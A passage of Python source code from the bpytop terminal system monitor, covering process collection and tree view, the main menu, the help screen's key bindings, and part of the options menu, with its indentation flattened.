p.info["num_threads"] = 0
if search:
if cls.detailed and p.info["pid"] == cls.detailed_pid:
cls.det_cpu = p.info["cpu_percent"]
for value in [ p.info["name"], " ".join(p.info["cmdline"]), str(p.info["pid"]), p.info["username"] ]:
if not cls.case_sensitive:
value = value.lower()
for s in search:
if s in value:
break
else: continue
break
else: continue
cpu = p.info["cpu_percent"] if proc_per_cpu else round(p.info["cpu_percent"] / THREADS, 2)
mem = p.info["memory_percent"]
if CONFIG.proc_mem_bytes and hasattr(p.info["memory_info"], "rss"):
mem_b = p.info["memory_info"].rss
else:
mem_b = 0
cmd = " ".join(p.info["cmdline"]) or "[" + p.info["name"] + "]"
out[p.info["pid"]] = {
"name" : p.info["name"],
"cmd" : cmd.replace("\n", "").replace("\t", "").replace("\\", ""),
"threads" : p.info["num_threads"],
"username" : p.info["username"],
"mem" : mem,
"mem_b" : mem_b,
"cpu" : cpu }
n += 1
cls.num_procs = n
cls.processes = out.copy()
if cls.detailed:
cls.expand = ((ProcBox.width - 2) - ((ProcBox.width - 2) // 3) - 40) // 10
if cls.expand > 5: cls.expand = 5
if cls.detailed and not cls.details.get("killed", False):
try:
c_pid = cls.detailed_pid
det = psutil.Process(c_pid)
except (psutil.NoSuchProcess, psutil.ZombieProcess):
cls.details["killed"] = True
cls.details["status"] = psutil.STATUS_DEAD
ProcBox.redraw = True
else:
attrs: List[str] = ["status", "memory_info", "create_time"]
if not SYSTEM == "MacOS": attrs.extend(["cpu_num"])
if cls.expand:
attrs.extend(["nice", "terminal"])
if not SYSTEM == "MacOS": attrs.extend(["io_counters"])
if not c_pid in cls.processes: attrs.extend(["pid", "name", "cmdline", "num_threads", "username", "memory_percent"])
cls.details = det.as_dict(attrs=attrs, ad_value="")
if det.parent() != None: cls.details["parent_name"] = det.parent().name()
else: cls.details["parent_name"] = ""
cls.details["pid"] = c_pid
if c_pid in cls.processes:
cls.details["name"] = cls.processes[c_pid]["name"]
cls.details["cmdline"] = cls.processes[c_pid]["cmd"]
cls.details["threads"] = f'{cls.processes[c_pid]["threads"]}'
cls.details["username"] = cls.processes[c_pid]["username"]
cls.details["memory_percent"] = cls.processes[c_pid]["mem"]
cls.details["cpu_percent"] = round(cls.processes[c_pid]["cpu"] * (1 if CONFIG.proc_per_core else THREADS))
else:
cls.details["cmdline"] = " ".join(cls.details["cmdline"]) or "[" + cls.details["name"] + "]"
cls.details["threads"] = f'{cls.details["num_threads"]}'
cls.details["cpu_percent"] = round(cls.det_cpu)
cls.details["killed"] = False
if SYSTEM == "MacOS":
cls.details["cpu_num"] = -1
cls.details["io_counters"] = ""
if hasattr(cls.details["memory_info"], "rss"): cls.details["memory_bytes"] = floating_humanizer(cls.details["memory_info"].rss) # type: ignore
else: cls.details["memory_bytes"] = "? Bytes"
if isinstance(cls.details["create_time"], float):
uptime = timedelta(seconds=round(time()-cls.details["create_time"],0))
if uptime.days > 0: cls.details["uptime"] = f'{uptime.days}d {str(uptime).split(",")[1][:-3].strip()}'
else: cls.details["uptime"] = f'{uptime}'
else: cls.details["uptime"] = "??:??:??"
if cls.expand:
if cls.expand > 1 : cls.details["nice"] = f'{cls.details["nice"]}'
if SYSTEM == "BSD":
if cls.expand > 2:
if hasattr(cls.details["io_counters"], "read_count"): cls.details["io_read"] = f'{cls.details["io_counters"].read_count}'
else: cls.details["io_read"] = "?"
if cls.expand > 3:
if hasattr(cls.details["io_counters"], "write_count"): cls.details["io_write"] = f'{cls.details["io_counters"].write_count}'
else: cls.details["io_write"] = "?"
else:
if cls.expand > 2:
if hasattr(cls.details["io_counters"], "read_bytes"): cls.details["io_read"] = floating_humanizer(cls.details["io_counters"].read_bytes)
else: cls.details["io_read"] = "?"
if cls.expand > 3:
if hasattr(cls.details["io_counters"], "write_bytes"): cls.details["io_write"] = floating_humanizer(cls.details["io_counters"].write_bytes)
else: cls.details["io_write"] = "?"
if cls.expand > 4 : cls.details["terminal"] = f'{cls.details["terminal"]}'.replace("/dev/", "")
cls.details_cpu.append(cls.details["cpu_percent"])
mem = cls.details["memory_percent"]
if mem > 80: mem = round(mem)
elif mem > 60: mem = round(mem * 1.2)
elif mem > 30: mem = round(mem * 1.5)
elif mem > 10: mem = round(mem * 2)
elif mem > 5: mem = round(mem * 10)
else: mem = round(mem * 20)
cls.details_mem.append(mem)
if len(cls.details_cpu) > ProcBox.width: del cls.details_cpu[0]
if len(cls.details_mem) > ProcBox.width: del cls.details_mem[0]
@classmethod
def _tree(cls, sort_cmd, reverse: bool, proc_per_cpu: bool, search: List[str]):
'''List all processess in a tree view with pid, name, threads, username, memory percent and cpu percent'''
out: Dict = {}
err: float = 0.0
det_cpu: float = 0.0
infolist: Dict = {}
cls.tree_counter += 1
tree = defaultdict(list)
n: int = 0
for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
if cls.collect_interrupt: return
try:
tree[p.ppid()].append(p.pid)
except (psutil.NoSuchProcess, psutil.ZombieProcess):
pass
else:
infolist[p.pid] = p.info
n += 1
if 0 in tree and 0 in tree[0]:
tree[0].remove(0)
def create_tree(pid: int, tree: defaultdict, indent: str = "", inindent: str = " ", found: bool = False, depth: int = 0, collapse_to: Union[None, int] = None):
nonlocal infolist, proc_per_cpu, search, out, det_cpu
name: str; threads: int; username: str; mem: float; cpu: float; collapse: bool = False
cont: bool = True
getinfo: Dict = {}
if cls.collect_interrupt: return
try:
name = psutil.Process(pid).name()
if name == "idle": return
except psutil.Error:
pass
cont = False
name = ""
if pid in infolist:
getinfo = infolist[pid]
if search and not found:
if cls.detailed and pid == cls.detailed_pid:
det_cpu = getinfo["cpu_percent"]
if "username" in getinfo and isinstance(getinfo["username"], float): getinfo["username"] = ""
if "cmdline" in getinfo and isinstance(getinfo["cmdline"], float): getinfo["cmdline"] = ""
for value in [ name, str(pid), getinfo.get("username", ""), " ".join(getinfo.get("cmdline", "")) ]:
if not cls.case_sensitive:
value = value.lower()
for s in search:
if s in value:
found = True
break
else: continue
break
else: cont = False
if cont:
if getinfo:
if getinfo["num_threads"] == err: threads = 0
else: threads = getinfo["num_threads"]
if getinfo["username"] == err: username = ""
else: username = getinfo["username"]
cpu = getinfo["cpu_percent"] if proc_per_cpu else round(getinfo["cpu_percent"] / THREADS, 2)
mem = getinfo["memory_percent"]
if getinfo["cmdline"] == err: cmd = ""
else: cmd = " ".join(getinfo["cmdline"]) or "[" + getinfo["name"] + "]"
if CONFIG.proc_mem_bytes and hasattr(getinfo["memory_info"], "rss"):
mem_b = getinfo["memory_info"].rss
else:
mem_b = 0
else:
threads = mem_b = 0
username = ""
mem = cpu = 0.0
if pid in cls.collapsed:
collapse = cls.collapsed[pid]
else:
collapse = depth > CONFIG.tree_depth
cls.collapsed[pid] = collapse
if collapse_to and not search:
out[collapse_to]["threads"] += threads
out[collapse_to]["mem"] += mem
out[collapse_to]["mem_b"] += mem_b
out[collapse_to]["cpu"] += cpu
else:
if pid in tree and len(tree[pid]) > 0:
sign: str = "+" if collapse else "-"
inindent = inindent.replace(" ├─ ", "[" + sign + "]─").replace(" └─ ", "[" + sign + "]─")
out[pid] = {
"indent" : inindent,
"name": name,
"cmd" : cmd.replace("\n", "").replace("\t", "").replace("\\", ""),
"threads" : threads,
"username" : username,
"mem" : mem,
"mem_b" : mem_b,
"cpu" : cpu,
"depth" : depth,
}
if search: collapse = False
elif collapse and not collapse_to:
collapse_to = pid
if pid not in tree:
return
children = tree[pid][:-1]
for child in children:
create_tree(child, tree, indent + " │ ", indent + " ├─ ", found=found, depth=depth+1, collapse_to=collapse_to)
create_tree(tree[pid][-1], tree, indent + " ", indent + " └─ ", depth=depth+1, collapse_to=collapse_to)
create_tree(min(tree), tree)
cls.det_cpu = det_cpu
if cls.collect_interrupt: return
if cls.tree_counter >= 100:
cls.tree_counter = 0
for pid in list(cls.collapsed):
if not psutil.pid_exists(pid):
del cls.collapsed[pid]
cls.num_procs = len(out)
cls.processes = out.copy()
@classmethod
def sorting(cls, key: str):
index: int = CONFIG.sorting_options.index(CONFIG.proc_sorting) + (1 if key in ["right", "l"] else -1)
if index >= len(CONFIG.sorting_options): index = 0
elif index < 0: index = len(CONFIG.sorting_options) - 1
CONFIG.proc_sorting = CONFIG.sorting_options[index]
if "left" in Key.mouse: del Key.mouse["left"]
Collector.collect(ProcCollector, interrupt=True, redraw=True)
@classmethod
def _draw(cls):
ProcBox._draw_fg()
class Menu:
'''Holds all menus'''
active: bool = False
close: bool = False
resized: bool = True
menus: Dict[str, Dict[str, str]] = {}
menu_length: Dict[str, int] = {}
background: str = ""
for name, menu in MENUS.items():
menu_length[name] = len(menu["normal"][0])
menus[name] = {}
for sel in ["normal", "selected"]:
menus[name][sel] = ""
for i in range(len(menu[sel])):
menus[name][sel] += Fx.trans(f'{Color.fg(MENU_COLORS[sel][i])}{menu[sel][i]}')
if i < len(menu[sel]) - 1: menus[name][sel] += f'{Mv.d(1)}{Mv.l(len(menu[sel][i]))}'
@classmethod
def main(cls):
if Term.width < 80 or Term.height < 24:
errlog.warning(f'The menu system only works on a terminal size of 80x24 or above!')
return
out: str = ""
banner: str = ""
redraw: bool = True
key: str = ""
mx: int = 0
my: int = 0
skip: bool = False
mouse_over: bool = False
mouse_items: Dict[str, Dict[str, int]] = {}
cls.active = True
cls.resized = True
menu_names: List[str] = list(cls.menus.keys())
menu_index: int = 0
menu_current: str = menu_names[0]
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
while not cls.close:
key = ""
if cls.resized:
banner = (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
if UpdateChecker.version != VERSION:
banner += f'{Mv.to(Term.height, 1)}{Fx.b}{THEME.title}New release {UpdateChecker.version} available at https://github.com/aristocratos/bpytop{Fx.ub}{Term.fg}'
cy = 0
for name, menu in cls.menus.items():
ypos = Term.height // 2 - 2 + cy
xpos = Term.width // 2 - (cls.menu_length[name] // 2)
mouse_items[name] = { "x1" : xpos, "x2" : xpos + cls.menu_length[name] - 1, "y1" : ypos, "y2" : ypos + 2 }
cy += 3
redraw = True
cls.resized = False
if redraw:
out = ""
for name, menu in cls.menus.items():
out += f'{Mv.to(mouse_items[name]["y1"], mouse_items[name]["x1"])}{menu["selected" if name == menu_current else "normal"]}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{banner}{out}')
skip = redraw = False
if Key.input_wait(Timer.left(), mouse=True):
if Key.mouse_moved():
mx, my = Key.get_mouse()
for name, pos in mouse_items.items():
if pos["x1"] <= mx <= pos["x2"] and pos["y1"] <= my <= pos["y2"]:
mouse_over = True
if name != menu_current:
menu_current = name
menu_index = menu_names.index(name)
redraw = True
break
else:
mouse_over = False
else:
key = Key.get()
if key == "mouse_click" and not mouse_over:
key = "M"
if key == "q":
clean_quit()
elif key in ["escape", "M"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "shift_tab"]:
menu_index -= 1
if menu_index < 0: menu_index = len(menu_names) - 1
menu_current = menu_names[menu_index]
redraw = True
elif key in ["down", "mouse_scroll_down", "tab"]:
menu_index += 1
if menu_index > len(menu_names) - 1: menu_index = 0
menu_current = menu_names[menu_index]
redraw = True
elif key == "enter" or (key == "mouse_click" and mouse_over):
if menu_current == "quit":
clean_quit()
elif menu_current == "options":
cls.options()
cls.resized = True
elif menu_current == "help":
cls.help()
cls.resized = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def help(cls):
if Term.width < 80 or Term.height < 24:
errlog.warning(f'The menu system only works on a terminal size of 80x24 or above!')
return
out: str = ""
out_misc : str = ""
redraw: bool = True
key: str = ""
skip: bool = False
main_active: bool = cls.active
cls.active = True
cls.resized = True
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
help_items: Dict[str, str] = {
"(Mouse 1)" : "Clicks buttons and selects in process list.",
"Selected (Mouse 1)" : "Show detailed information for selected process.",
"(Mouse scroll)" : "Scrolls any scrollable list/text under cursor.",
"(Esc, shift+m)" : "Toggles main menu.",
"(m)" : "Cycle view presets, order: full->proc->stat->user.",
"(1)" : "Toggle CPU box.",
"(2)" : "Toggle MEM box.",
"(3)" : "Toggle NET box.",
"(4)" : "Toggle PROC box.",
"(d)" : "Toggle disks view in MEM box.",
"(F2, o)" : "Shows options.",
"(F1, shift+h)" : "Shows this window.",
"(ctrl+z)" : "Sleep program and put in background.",
"(ctrl+c, q)" : "Quits program.",
"(+) / (-)" : "Add/Subtract 100ms to/from update timer.",
"(Up, k) (Down, j)" : "Select in process list.",
"(Enter)" : "Show detailed information for selected process.",
"(Spacebar)" : "Expand/collapse the selected process in tree view.",
"(Pg Up) (Pg Down)" : "Jump 1 page in process list.",
"(Home) (End)" : "Jump to first or last page in process list.",
"(Left, h) (Right, l)" : "Select previous/next sorting column.",
"(b) (n)" : "Select previous/next network device.",
"(s)" : "Toggle showing swap as a disk.",
"(i)" : "Toggle disks io mode with big graphs.",
"(z)" : "Toggle totals reset for current network device",
"(a)" : "Toggle auto scaling for the network graphs.",
"(y)" : "Toggle synced scaling mode for network graphs.",
"(f)" : "Input a NON case-sensitive process filter.",
"(shift+f)" : "Input a case-sensitive process filter.",
"(c)" : "Toggle per-core cpu usage of processes.",
"(r)" : "Reverse sorting order in processes box.",
"(e)" : "Toggle processes tree view.",
"(delete)" : "Clear any entered filter.",
"Selected (shift+t)" : "Terminate selected process with SIGTERM - 15.",
"Selected (shift+k)" : "Kill selected process with SIGKILL - 9.",
"Selected (shift+i)" : "Interrupt selected process with SIGINT - 2.",
"_1" : " ",
"_2" : "For bug reporting and project updates, visit:",
"_3" : "https://github.com/aristocratos/bpytop",
}
while not cls.close:
key = ""
if cls.resized:
y = 8 if Term.height < len(help_items) + 10 else Term.height // 2 - len(help_items) // 2 + 4
out_misc = (f'{Banner.draw(y-7, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-36
h, w = Term.height-2-y, 72
if len(help_items) > h:
pages = ceil(len(help_items) / h)
else:
h = len(help_items)
pages = 0
page = 1
out_misc += create_box(x, y, w, h+3, "help", line_color=THEME.div_line)
redraw = True
cls.resized = False
if redraw:
out = ""
cy = 0
if pages:
out += (f'{Mv.to(y, x+56)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, (keys, desc) in enumerate(help_items.items()):
if pages and n < (page - 1) * h: continue
out += f'{Mv.to(y+2+cy, x+1)}{Fx.b}{("" if keys.startswith("_") else keys):^20.20}{Fx.ub}{desc:50.50}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+2+cy+i, x+1)}{" " * (w-2)}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
if key == "mouse_click":
mx, my = Key.get_mouse()
if x <= mx < x + w and y <= my < y + h + 3:
if pages and my == y and x + 56 < mx < x + 61:
key = "up"
elif pages and my == y and x + 63 < mx < x + 68:
key = "down"
else:
key = "escape"
if key == "q":
clean_quit()
elif key in ["escape", "M", "enter", "backspace", "H", "f1"]:
cls.close = True
break
elif key in ["up", "mouse_scroll_up", "page_up"] and pages:
page -= 1
if page < 1: page = pages
redraw = True
elif key in ["down", "mouse_scroll_down", "page_down"] and pages:
page += 1
if page > pages: page = 1
redraw = True
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
@classmethod
def options(cls):
if Term.width < 80 or Term.height < 24:
errlog.warning(f'The menu system only works on a terminal size of 80x24 or above!')
return
out: str = ""
out_misc : str = ""
redraw: bool = True
selected_cat: str = ""
selected_int: int = 0
option_items: Dict[str, List[str]] = {}
cat_list: List[str] = []
cat_int: int = 0
change_cat: bool = False
key: str = ""
skip: bool = False
main_active: bool = cls.active
cls.active = True
cls.resized = True
d_quote: str
inputting: bool = False
input_val: str = ""
Theme.refresh()
if not cls.background:
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
categories: Dict[str, Dict[str, List[str]]] = {
"system" : {
"color_theme" : [
'Set color theme.',
'',
'Choose from all theme files in',
'"/usr/[local/]share/bpytop/themes" and',
'"~/.config/bpytop/themes".',
'',
'"Default" for builtin default theme.',
'User themes are prefixed by a plus sign "+".',
'',
'For theme updates see:',
'https://github.com/aristocratos/bpytop'],
"theme_background" : [
'If the theme set background should be shown.',
'',
'Set to False if you want terminal background',
'transparency.'],
"truecolor" : [
'Sets if 24-bit truecolor should be used.',
'(Requires restart to take effect!)',
'',
'Will convert 24-bit colors to 256 color',
'(6x6x6 color cube) if False.',
'',
'Set to False if your terminal doesn\'t have',
'truecolor support and can\'t convert to',
'256-color.'],
"shown_boxes" : [
'Manually set which boxes to show.',
'',
'Available values are "cpu mem net proc".',
'Seperate values with whitespace.',
'',
'Toggle between presets with mode key "m".'],
"update_ms" : [
'Update time in milliseconds.',
'',
'Recommended 2000 ms or above for better sample',
'times for graphs.',
'',
'Min value: 100 ms',
'Max value: 86400000 ms = 24 hours.'],
"draw_clock" : [
'Draw a clock at top of screen.',
'(Only visible if cpu box is enabled!)',
'',
'Formatting according to strftime, empty',
'string to disable.',
'',
'Custom formatting options:',
'"/host" = hostname',
'"/user" = username',
'"/uptime" = system uptime',
'',
'Examples of strftime formats:',
'"%X" = locale HH:MM:SS',
'"%H" = 24h hour, "%I" = 12h hour',
'"%M" = minute, "%S" = second',
'"%d" = day, "%m" = month, "%y" = year'],
"background_update" : [
'Update main ui when menus are showing.',
'',
'True or False.',
'',
'Set this to false if the menus is flickering',
'too much for a comfortable experience.'],
"show_battery" : [
'Show battery stats.',
'(Only visible if cpu box is enabled!)',
'',
'Show battery stats in the top right corner',
'if a battery is present.'],
"show_init" : [
'Show init screen at startup.',
'',
'The init screen is purely cosmetical and',
'slows down start to show status messages.'],
"update_check" : [
'Check for updates at start.',
'',
'Checks for latest version from:',
'https://github.com/aristocratos/bpytop'],
"log_level" : [
'Set loglevel for error.log',
'',
'Levels are: "ERROR" "WARNING" "INFO" "DEBUG".',
'The level set includes all lower levels,',
'i.e. "DEBUG" will show all logging info.']
},
"cpu" : {
"cpu_graph_upper" : [
'Sets the CPU stat shown in upper half of',
'the CPU graph.',
'',
'"total" = Total cpu usage.',
'"user" = User mode cpu usage.',
'"system" = Kernel mode cpu usage.',
'See:',
'https://psutil.readthedocs.io/en/latest/',
'#psutil.cpu_times',
'for attributes available on specific platforms.'],
"cpu_graph_lower" : [
'Sets the CPU stat shown in lower half of',
'the CPU graph.',
'',
'"total" = Total cpu usage.',
'"user" = User mode cpu usage.',
'"system" = Kernel mode cpu usage.',
'See:',
'https://psutil.readthedocs.io/en/latest/',
'#psutil.cpu_times',
'for attributes available on specific platforms.'],
"cpu_invert_lower" : [
'Toggles orientation of the lower CPU graph.',
'',
'True or False.'],
"cpu_single_graph" : [
'Completely disable the lower CPU graph.',
'',
'Shows only upper CPU graph and resizes it',
'to fit to box height.',
'',
'True or False.'],
"check_temp" : [
'Enable cpu temperature reporting.',
'',
'True or False.'],
"cpu_sensor" : [
'Cpu temperature sensor',
'',
'Select the sensor that corresponds to',
'your cpu temperature.',
'Set to "Auto" for auto detection.'],
"show_coretemp" : [
'Show temperatures for cpu cores.',
'',
'Only works if check_temp is True and',
'the system is reporting core temps.'],
"custom_cpu_name" : [
'Custom cpu model name in cpu percentage box.',
'',
'Empty string to disable.'],
"show_uptime" : [
'Shows the system uptime in the CPU box.',
'',
'Can also be shown in the clock by using',
'"/uptime" in the formatting.',
'',
'True or False.'],
},
"mem" : {
"mem_graphs" : [
'Show graphs for memory values.',
'',
'True or False.'],
"show_disks" : [
'Split memory box to also show disks.',
'',
'True or False.'],
"show_io_stat" : [
'Toggle small IO stat graphs.',
'',
'Toggles the small IO graphs for the regular',
'disk usage view.',
'',
'True or False.'],
"io_mode" : [
'Toggles io mode for disks.',
'',
'Shows big graphs for disk read/write speeds',
'instead of used/free percentage meters.',
'',
'True or False.'],
"io_graph_combined" : [
'Toggle combined read and write graphs.',
'',
'Only has effect if "io mode" is True.',
'',
'True or False.'],
"io_graph_speeds" : [
'Set top speeds for the io graphs.',
'',
'Manually set which speed in MiB/s that equals',
'100 percent in the io graphs.',
'(10 MiB/s by default).',
'',
'Format: "device:speed" seperate disks with a',
'comma ",".',
'',
'Example: "/dev/sda:100, /dev/sdb:20".'],
"show_swap" : [
'If swap memory should be shown in memory box.',
'',
'True or False.'],
"swap_disk" : [
'Show swap as a disk.',
'',
'Ignores show_swap value above.',
'Inserts itself after first disk.'],
"only_physical" : [
'Filter out non physical disks.',
'',
'Set this to False to include network disks,',
'RAM disks and similar.',
'',
'True or False.'],
"use_fstab" : [
'Read disks list from /etc/fstab.',
'(Has no effect on macOS X)',
'',
'This also disables only_physical.',
'',
'True or False.'],
"disks_filter" : [
'Optional filter for shown disks.',
'',
'Should be full path of a mountpoint,',
'"root" replaces "/", separate multiple values',
'with a comma ",".',
'Begin line with "exclude=" to change to exclude',
'filter.',
'Oterwise defaults to "most include" filter.',
'',
'Example: disks_filter="exclude=/boot, /home/user"'],
},
"net" : {
"net_download" : [
'Fixed network graph download value.',
'',
'Default "10M" = 10 MibiBytes.',
'Possible units:',
'"K" (KiB), "M" (MiB), "G" (GiB).',
'',
'Append "bit" for bits instead of bytes,',
'i.e "100Mbit"',
'',
'Can be toggled with auto button.'],
"net_upload" : [
'Fixed network graph upload value.',
'',
'Default "10M" = 10 MibiBytes.',
'Possible units:',
'"K" (KiB), "M" (MiB), "G" (GiB).',
'',
'Append "bit" for bits instead of bytes,',
'i.e "100Mbit"',
'',
'Can be toggled with auto button.'],
"net_auto" : [
'Start in network graphs auto rescaling mode.',
'',
'Ignores any values set above at start and',
'rescales down to 10KibiBytes at the lowest.',
'',
'True or False.'],
"net_sync" : [
'Network scale sync.',
'',
'Syncs the scaling for download and upload to',
'whichever currently has the highest scale.',
'',
'True or False.'],
"net_color_fixed" : [
'Set network graphs color gradient to fixed.',
'',
'If True the network graphs color is based',
'on the total bandwidth usage instead of',
'the current autoscaling.',
'',
'The bandwidth usage is based on the',
'"net_download" and "net_upload" values set',
'above.'],
"net_iface" : [
'Network Interface.',
'',
'Manually set the starting Network Interface.',
'Will otherwise automatically choose the NIC',
'with the highest total download since boot.'],
},
"proc" : {
"proc_update_mult" : [
'Processes update multiplier.',
'Sets how often the process list is updated as',
'a multiplier of "update_ms".',
'',
'Set to 2 or higher to greatly decrease bpytop',
'cpu usage. (Only integers)'],
"proc_sorting" : [
'Processes sorting option.',
'',
'Possible values: "pid", "program", "arguments",',
'"threads", "user", "memory", "cpu lazy" and',
'"cpu responsive".',
'',
'"cpu lazy" updates top process over time,',
'"cpu responsive" updates top process directly.'],
"proc_reversed" : [
'Reverse processes sorting order.',
'',
'True or False.'],
"proc_tree" : [
'Processes tree view.',
'',
'Set true to show processes grouped by parents,',
'with lines drawn between parent and child',
'process.'],
"tree_depth" : [
'Process tree auto collapse depth.',
'',
'Sets the depth were the tree view will auto',
'collapse processes at.'],
"proc_colors" : [
'Enable colors in process view.',
'',
'Uses the cpu graph gradient colors.'],
"proc_gradient" : [
'Enable process view gradient fade.',
'',
'Fades from top or current selection.',
'Max fade value is equal to current themes',
'"inactive_fg" color value.'],
"proc_per_core" : [
'Process usage per core.',
'',
'If process cpu usage should be of the core',
'it\'s running on or usage of the total',
'available cpu power.',
'',
'If true and process is multithreaded',
'cpu usage can reach over 100%.'],
"proc_mem_bytes" : [
'Show memory as bytes in process list.',
' ',
'True or False.'],
}
}
loglevel_i: int = CONFIG.log_levels.index(CONFIG.log_level)
cpu_sensor_i: int = CONFIG.cpu_sensors.index(CONFIG.cpu_sensor)
cpu_graph_i: Dict[str, int] = { "cpu_graph_upper" : CONFIG.cpu_percent_fields.index(CONFIG.cpu_graph_upper),
"cpu_graph_lower" : CONFIG.cpu_percent_fields.index(CONFIG.cpu_graph_lower)}
color_i: int
max_opt_len: int = max([len(categories[x]) for x in categories]) * 2
cat_list = list(categories)
while not cls.close:
key = ""
if cls.resized or change_cat:
cls.resized = change_cat = False
selected_cat = list(categories)[cat_int]
option_items = categories[cat_list[cat_int]]
option_len: int = len(option_items) * 2
y = 12 if Term.height < max_opt_len + 13 else Term.height // 2 - max_opt_len // 2 + 7
out_misc = (f'{Banner.draw(y-10, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-38
x2 = x + 27
h, w, w2 = min(Term.height-1-y, option_len), 26, 50
h -= h % 2
color_i = list(Theme.themes).index(THEME.current)
out_misc += create_box(x, y - 3, w+w2+1, 3, f'tab{Symbol.right}', line_color=THEME.div_line)
out_misc += create_box(x, y, w, h+2, "options", line_color=THEME.div_line)
redraw = True
cat_width = floor((w+w2) / len(categories))
out_misc += f'{Fx.b}'
for cx, cat in enumerate(categories):
out_misc += f'{Mv.to(y-2, x + 1 + (cat_width * cx) + round(cat_width / 2 - len(cat) / 2 ))}'
if cat == selected_cat:
out_misc += f'{THEME.hi_fg}[{THEME.title}{Fx.u}{cat}{Fx.uu}{THEME.hi_fg}]'
else:
out_misc += f'{THEME.hi_fg}{SUPERSCRIPT[cx+1]}{THEME.title}{cat}'
out_misc += f'{Fx.ub}'
if option_len > h:
pages = ceil(option_len / h)
else:
h = option_len
pages = 0
page = pages if selected_int == -1 and pages > 0 else 1
selected_int = 0 if selected_int >= 0 else len(option_items) - 1
if redraw:
out = ""
cy = 0
selected = list(option_items)[selected_int]
if pages:
out += (f'{Mv.to(y+h+1, x+11)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
#out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, opt in enumerate(option_items):
if pages and n < (page - 1) * ceil(h / 2): continue
value = getattr(CONFIG, opt)
t_color = f'{THEME.selected_bg}{THEME.selected_fg}' if opt == selected else f'{THEME.title}'
v_color = "" if opt == selected else f'{THEME.title}'
d_quote = '"' if isinstance(value, str) else ""
if opt == "color_theme":
counter = f' {color_i + 1}/{len(Theme.themes)}'
elif opt == "proc_sorting":
counter = f' {CONFIG.sorting_options.index(CONFIG.proc_sorting) + 1}/{len(CONFIG.sorting_options)}'
elif opt == "log_level":
counter = f' {loglevel_i + 1}/{len(CONFIG.log_levels)}'
elif opt == "cpu_sensor":
counter = f' {cpu_sensor_i + 1}/{len(CONFIG.cpu_sensors)}'
elif opt in ["cpu_graph_upper", "cpu_graph_lower"]:
counter = f' {cpu_graph_i[opt] + 1}/{len(CONFIG.cpu_percent_fields)}'
else:
counter = ""
out += f'{Mv.to(y+1+cy, x+1)}{t_color}{Fx.b}{opt.replace("_", " ").capitalize() + counter:^24.24}{Fx.ub}{Mv.to(y+2+cy, x+1)}{v_color}'
if opt == selected:
if isinstance(value, bool) or opt in ["color_theme", "proc_sorting", "log_level", "cpu_sensor", "cpu_graph_upper", "cpu_graph_lower"]:
out += f'{t_color} {Symbol.left}{v_color}{d_quote + str(value) + d_quote:^20.20}{t_color}{Symbol.right} '
elif inputting:
out += f'{str(input_val)[-17:] + Fx.bl + "█" + Fx.ubl + "" + Symbol.enter:^33.33}'
else:
out += ((f'{t_color} {Symbol.left}{v_color}' if type(value) is int else " ") +
f'{str(value) + " " + Symbol.enter:^20.20}' + (f'{t_color}{Symbol.right} ' if type(value) is int else " "))
else:
out += f'{d_quote + str(value) + d_quote:^24.24}'
out += f'{Term.bg}'
if opt == selected:
h2 = len(option_items[opt]) + 2
y2 = y + (selected_int * 2) - ((page-1) * h)
if y2 + h2 > Term.height: y2 = Term.height - h2
out += f'{create_box(x2, y2, w2, h2, "description", line_color=THEME.div_line)}{THEME.main_fg}'
for n, desc in enumerate(option_items[opt]):
out += f'{Mv.to(y2+1+n, x2+2)}{desc:.48}'
cy += 2
if cy >= h: break
if cy < h:
for i in range(h-cy):
